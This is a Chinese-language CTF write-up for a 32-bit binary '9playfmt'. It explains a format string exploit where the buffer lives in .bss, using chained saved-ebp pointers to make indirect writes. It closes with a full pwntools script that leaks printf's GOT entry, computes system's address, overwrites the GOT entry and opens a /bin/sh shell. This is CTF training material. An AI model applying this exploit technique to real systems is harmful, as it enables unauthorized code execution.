check一下,发现只开了NX
image.png
拖进ida,发现格式化字符串漏洞,但我们的输入buf不在栈上,而是在bss段上,所以我们不能用%s%p%n去读取和写入栈的数据了,只能间接得去写和读数据,通过ebp保存的数据从而实现数据的读写。
image.png
https://blog.csdn.net/Maxmalloc/article/details/85109592
//www.greatytc.com/p/2cae38284bff
思路:
选择两个相邻的ebp,计算出格式化字符串与他们的距离,同时我们还需要两个地方用来存printf 的got表。在这里我们选择与两个ebp相邻的单元。(这是因为相邻的单元里面存的是.text段的地址,这样在后面我们改写为相应的got表地址时只需要改两个字节就可以了,不需要改太多)ebp1的内容是指向ebp2的地址的指针,而ebp2的内容又是指向其他地址的指针,因此如果我们用%n对ebp1进行操作,那么实际上会修改ebp2的值,如果此时再把ebp2的内容改成一个指向fmt的指针,然后在对ebp2进行%n操作,那么就可以改变fmt的内容,从而实现了间接修改某个地址的内容,试想一下,我们把fmt的内容又改成printf的got表地址,那么fmt就指向了printf_got的地址,如果用%s操作,就可以把printf_got的内容打印出来,从而得到了printf函数的真正地址,到了这里,我们就可以通过printf函数泄漏出system的真正地址了
查看栈
image.png
image.png
脚本:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./9playfmt')
elf = ELF('./9playfmt')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
printf_got = elf.got['printf']
system_libc = libc.symbols['system']
printf_libc = libc.symbols['printf']
p.recv()
payload = '%6$x'
p.sendline(payload)
ebp2 = int(p.recv(),16)
ebp1 = ebp2 - 0x10
fmt_7 = ebp2 -0x0c
fmt_11 = ebp2 + 0x04
payload = '%' + str(fmt_7 & 0xffff) + 'c%6$hn'
p.sendline(payload)
p.recv()
payload = '%' + str(printf_got & 0xffff) + 'c%10$hn'
p.sendline(payload)
p.recv()
while True:
p.send("y0ona")
sleep(0.1)
data = p.recv()
if data.find("y0ona") != -1:
break
payload = '%' + str(fmt_11 & 0xffff) + 'c%6$hn'
p.sendline(payload)
p.recv()
payload = '%' + str((printf_got+2) & 0xffff) + 'c%10$hn'
p.sendline(payload)
p.recv()
while True:
p.send("y0ona")
sleep(0.1)
data = p.recv()
if data.find("y0ona") != -1:
break
payload = 'aaaa%7$s'
p.sendline(payload)
p.recvuntil("aaaa")
printf_addr = u32(p.recv(4))
system_addr = printf_addr - printf_libc + system_libc
payload = '%' +str(system_addr &0xffff) +'c%7$hn'
payload += '%' +str((system_addr>>16) - (system_addr &0xffff)) +'c%11$hn'
p.sendline(payload)
p.recv()
while True:
p.send("y0ona")
sleep(0.1)
data = p.recv()
if data.find("y0ona") != -1:
break
p.sendline("/bin/sh")
p.interactive()
